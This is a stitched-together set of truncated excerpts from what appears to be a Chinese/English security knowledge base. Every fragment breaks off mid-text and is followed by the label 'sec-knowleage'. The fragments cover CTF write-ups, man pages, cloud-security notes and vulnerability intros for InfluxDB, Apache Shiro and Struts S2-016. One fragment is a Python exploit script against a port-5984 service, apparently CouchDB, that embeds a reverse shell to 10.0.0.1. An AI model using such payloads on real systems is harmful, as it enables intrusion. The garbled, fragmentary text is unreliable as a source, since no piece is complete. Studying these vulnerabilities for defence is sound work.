# T Wiki 云安全知识文库 [![GitHub stars](https://img.shields.io/github/stars/teamssix/twiki)](https://github.com/teamssix/twiki) [![](https://img.shields.io/badge/T%20Wiki%20-%E4%BA%91%E5%AE%89%E5%85%A8%E7%9F%A5%E8%AF%86%E6%96%87%E5%BA%93-blue)](https://wiki.teamssix.com/) [![](https://img.shields.io/badge/%E7%8B%BC%E7%BB%84%...
sec-knowleage
# Where am I Misc, 100 points ## Description: > What is the name of the city where the server for tamuctf.com is located? > > (Not in standard gigem{flag} format) ## Solution: We can use a service such as `iplocation.com` to determine the location of the server. ```console root@kali:/media/sf_CTFs/tamu/Where_am_I# cur...
sec-knowleage
.\" DO NOT MODIFY THIS FILE! It was generated by help2man 1.48.5. .\"******************************************************************* .\" .\" This file was generated with po4a. Translate the source file. .\" .\"******************************************************************* .TH UNLINK 1 2022年9月 "GNU coreutils 9...
sec-knowleage
# Raven:1 > https://download.vulnhub.com/raven/Raven.ova 靶场IP:`192.168.32.207` 扫描对外端口服务 ``` ┌──(root💀kali)-[~/Desktop] └─# nmap -p 1-65535 -sV 192.168.32.207 ...
sec-knowleage
# InfluxDB JWT 认证绕过漏洞(CVE-2019-20933) InfluxDB是一款著名的时序数据库,其使用jwt作为鉴权方式。 在其1.7.6版本以前,默认设置jwt的认证密钥`shared-secret`为空字符串,导致攻击者可以伪造任意用户身份在InfluxDB中执行SQL语句。 参考链接: - https://www.komodosec.com/post/when-all-else-fails-find-a-0-day - https://github.com/influxdata/influxdb/issues/12927 - https://github.com/LorenzoTullini/Inf...
sec-knowleage
--- title: 未配置默认根对象的风险简单分析 --- <center><h1>AWS CloudFront 未配置默认根对象的风险简单分析</h1></center> --- ## 0x00 前言 AWS CloudFront 简单理解就是 AWS 的 CDN 服务,在 AWS 安全标准和最佳实践中,AWS 官方将 CloudFront 未配置默认根对象这个问题定级为严重,这里来学习了解一下这个问题。 ## 0x01 介绍 我一般在直接看他们官方介绍的时候,第一眼往往会让人摸不着头脑,再仔细看看才会明白所表达的意思,不知道是不是因为翻译的问题,这里谈谈我所消化的理解。 要明白默认根对象,可以先看个例子:一般当我们在浏览器里输...
sec-knowleage
# Apache Shiro 1.2.4反序列化漏洞(CVE-2016-4437) Apache Shiro是一款开源安全框架,提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用,同时也能提供健壮的安全性。 Apache Shiro 1.2.4及以前版本中,加密的用户信息序列化后存储在名为remember-me的Cookie中。攻击者可以使用Shiro的默认密钥伪造用户Cookie,触发Java反序列化漏洞,进而在目标机器上执行任意命令。 ## 漏洞环境 执行如下命令启动一个使用了Apache Shiro 1.2.4的Web服务: ``` docker compose up -d ``` 服务启动后,访问`h...
sec-knowleage
.\" Automatically generated by Pod::Man v1.37, Pod::Parser v1.13 .\" .\" Standard preamble: .\" ======================================================================== .de Sh \" Subsection heading .br .if t .Sp .ne 5 .PP \fB\\$1\fR .PP .. .de Sp \" Vertical space (when we can't use .PP) .if t .sp .5v .if n .sp .. .de ...
sec-knowleage
od === 输出文件的八进制、十六进制等格式编码的字节 ## 补充说明 **od命令** 用于输出文件的八进制、十六进制或其它格式编码的字节,通常用于显示或查看文件中不能直接显示在终端的字符。 常见的文件为文本文件和二进制文件。此命令主要用来查看保存在二进制文件中的值。比如,程序可能输出大量的数据记录,每个数据是一个单精度浮点数。这些数据记录存放在一个文件中,如果想查看下这个数据,这时候od命令就派上用场了。在我看来,od命令主要用来格式化输出文件数据,即对文件中的数据进行无二义性的解释。不管是IEEE754格式的浮点数还是ASCII码,od命令都能按照需求输出它们的值。 ### 语法 ```shell od(选项)(参数) `...
sec-knowleage
# S2-016 Remote Code Execution Vulnerablity [中文版本(Chinese version)](README.zh-cn.md) Affected Version: 2.0.0 - 2.3.15 Details: - http://struts.apache.org/docs/s2-016.html - http://www.freebuf.com/articles/web/25337.html ## Setup ``` docker compose build docker compose up -d ``` ## Exploit Visit `http://your-i...
sec-knowleage
# SolidState 下载地址:https://download.vulnhub.com/solidstate/SolidState.zip ## 实战演练 找到靶场IP地址:`192.168.32.156` ![image-20220612194228691](../../.gitbook/assets/image-20220612194228691.png) 扫描对外端口 ``` ┌──(root💀kali)-[/tmp] └─# nmap -sT -sV -p1-65535 192.168.32.156 ...
sec-knowleage
# shellcode Binary Exploitation, 200 points ## Description: > This program executes any input you give it. Can you get a shell? ```c #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <sys/types.h> #define BUFSIZE 148 #define FLAGSIZE 128 void vuln(char *buf){ gets(buf); puts(b...
sec-knowleage
# SAML Injection > Security Assertion Markup Language (SAML) is an open standard that allows security credentials to be shared by multiple computers across a network. When using SAML-based Single Sign-On (SSO), three distinct parties are involved. There is a user (the so-called principal), an IDentity Provider (IDP), a...
sec-knowleage
dpkg-divert === Debian Linux中创建并管理一个转向列表 ## 补充说明 **dpkg-divert命令** 是Debian Linux中创建并管理一个转向(diversion)列表,其使得安装文件的默认位置失效的工具。 ### 语法 ```shell dpkg-divert(选项)(参数) ``` ### 选项 ```shell --add:添加一个转移文件; --remove:删除一个转移文件; --list:列出匹配的转移; --truename:对应转移文件真实文件名; --quidet:安静模式。 ``` ### 参数 文件:指定转移文件名。 ### 实例 指定软件包wibble安装时,写入...
sec-knowleage
#!/usr/bin/env python3 import requests import json import base64 from requests.auth import HTTPBasicAuth target = 'http://your-ip:5984' command = rb"""sh -i >& /dev/tcp/10.0.0.1/443 0>&1""" version = 1 session = requests.session() session.headers = { 'Content-Type': 'application/json' } # session.proxies = { # ...
sec-knowleage
.TH CHROOT "1" "August 1999" "GNU sh-utils 2.0" FSF .SH NAME chroot \- 以 特定 根 目录 运行 命令 或者 交互式 shell .SH "总览 (SYNOPSIS)" .B chroot [\fIOPTION\fR]\fI NEWROOT \fR[\fICOMMAND\fR...] .br .B chroot \fIOPTION\fR .SH "描述 (DESCRIPTION)" .PP 以 NEWROOT 为 根 目录 运行 COMMAND. .TP \fB\-\-help\fR 显示 帮助 并且 退出 .TP \fB\-\-version\fR 显示 版本 ...
sec-knowleage
--- title: dnswalk categories: Information Gathering tags: [dnswalk,information gathering,recon,dns,kali linux] date: 2016-10-21 10:07:46 --- 0x00 dnswalk介绍 ------------- dnswalk是一个DNS调试器,它执行指定域的传送,并以多种方式检查数据库内部一致性以及准确性。 工具来源:http://sourceforge.net/projects/dnswalk/ [dnstracer主页][1] | [Kali dnstracer Repo仓库][2] - 作者:D...
sec-knowleage
#!/usr/bin/env python3 import requests import random import string import time import threading import logging import sys import json logging.basicConfig(stream=sys.stdout, level=logging.INFO) def random_str(length): letters = string.ascii_lowercase + string.digits return ''.join(random.choice(letters) for c ...
sec-knowleage
# b4s1[4l (Misc 150) ``` Dive into this, it's a terrorist transmission, they can't know too much about encoding &|| cryptography. It was sent hundreds of times to all their supporters. We really think it s actually the same message. https://dctf.def.camp/b4s1.php Hint1: "What is normal in the challenge title?" Hint 2:...
sec-knowleage
### ZIP文件结构 `ZIP` 文件主要由三部分构成,分别为 | 压缩源文件数据区 | 核心目录 | 目录结束 | | ----------------------------------------------- | ----------------- | ------------------------------- | | local file header + file data + data descriptor | central directory | end of central dire...
sec-knowleage
# Cool Recovery Concept Category: Forensics ## Description > I received this image from my partner in Intro. to Computer Networks and it seems to be corrupted, can you fix it? A PNG file was attached. ## Solution From the challenge title we can already guess that we will be dealing with CRC mismatches. The PNG we've d...
sec-knowleage
# phpinfo --- **相关文章** - [phpinfo 可以告诉我们什么](http://zeroyu.xyz/2018/11/13/what-phpinfo-can-tell-we/) - [PHPINFO 中的重要信息](https://www.k0rz3n.com/2019/02/12/PHPINFO%20%E4%B8%AD%E7%9A%84%E9%87%8D%E8%A6%81%E4%BF%A1%E6%81%AF/) - [amazing phpinfo() ](https://skysec.top/2018/04/04/amazing-phpinfo/) - [phpinfo 中值得注意的信息](https://...
sec-knowleage
# 前言 **本指南/教程将从以下几个方面展开:** * 搭建一个虚拟的活动目录(Active Directory)域实验环境 * 凭证重放攻击 * 域权限提升 * Dump系统和域秘钥 * Empire, Bloodhound和ranger等工具的使用 * 实际渗透测试案例 如果你对上面的内容感到不知所措,那么我推荐你先看一下[Windows的哈希](https://github.com/crazywa1ker/DarthSidious-Chinese/blob/c6a34e54bf4195829a27866986287e2e44540975/getting-started/intro-to-windows-hashes.md)之...
sec-knowleage